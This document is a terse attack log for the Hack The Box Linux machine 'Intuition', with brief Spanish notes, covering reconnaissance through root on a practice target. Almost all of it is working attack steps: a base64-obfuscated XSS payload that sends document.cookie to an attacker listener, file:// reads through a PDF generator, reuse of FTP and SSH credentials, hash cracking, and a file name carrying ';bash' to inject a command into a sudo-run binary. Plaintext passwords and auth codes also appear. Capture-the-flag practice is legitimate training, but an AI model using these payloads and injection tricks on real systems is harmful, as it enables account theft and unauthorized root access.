Intuition
HTB Linux
nmap -A -p- -oA intuition 10.10.11.15 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA intuition 10.10.11.15
ping -c 1 10.10.11.15
echo "10.10.11.15 comprezzor.htb auth.comprezzor.htb dashboard.comprezzor.htb report.comprezzor.htb" | sudo tee -a /etc/hosts
nmap -sU -O -p- -oA intuition-udp 10.10.11.15
nmap -p- --open -T5 -v -n 10.10.11.15
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.15 -oG allPorts
extractPorts allPorts
nmap -sCV -p80,22 10.10.11.15 -oN targeted
bc targeted -l rb
whatweb http://10.10.11.15
wfuzz -c --hc=302,404,403,400 -t 200 -w /usr/share/Seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://10.10.11.15/ -H "Host: FUZZ.comprezzor.htb"
<img src=x onerror='eval(atob("ZmV0Y2goJ2h0dHA6Ly8xMC4xMC4xNC4zOjkwMDEvP2Nvb2tpZT0nK2RvY3VtZW50LmNvb2tpZSk="));' />
nc -lvnp 9001
Creamos otro tiquete
python3 -m http.server 80
Nos dirigimos a http://dashboard.compozzer.htb
Le damos click a uno de los tiquetes que acabamos de hacer y le ponemos un prioridad alta dandole click a set high priority
http://dashboard.compozzer.htb/create_pdf_report
file:///etc/passwd
file:///app/code/blueprints/dashboard/dashboard.py
ftp://ftp_admin:u3jai8y71s2@ftp.local
ftp://ftp_admin:u3jai8y71s2@ftp.local/private-8297.key
ftp://ftp_admin:u3jai8y71s2@ftp.local/welcome_note.txt
chmod 400 id_rsa
sudo ssh-keygen -p -f id_rsa
Y27SH19HDIWD
ssh -i id_rsa dev_acc@10.10.11.15
cat users.sql
cat users.db
sqlite3 users.db
Select * from users;
hashcat -m 30210 hash /usr/share/wordlists/rockyou.txt --show
ftp adam@localhost
prompt off
recurse on
mget *
cat run-tests.sh
zgrep -i lopez ./*.gz
Credenicales-> lopez:Lopezz1992%123
ssh lopez@10.10.11.15
sudo -l
sudo /opt/runner2/runner2
echo '{"run": {"action":""list"}, "auth_code":"UHI75GHINKOP"}' > new.json
sudo /opt/runner2/runner2 new.json
wget https://github.com/coopdevs/sys-admins-role/archive/v0.0.3.tar.gz
python3 -m http.server 80
wget http://10.10.14.3/v0.0.3.tar.gz
cat new.json | jq
mv v0.0.3.tar.gz admin.tar.gz\;bash
sudo /opt/runner2/runner2 new.json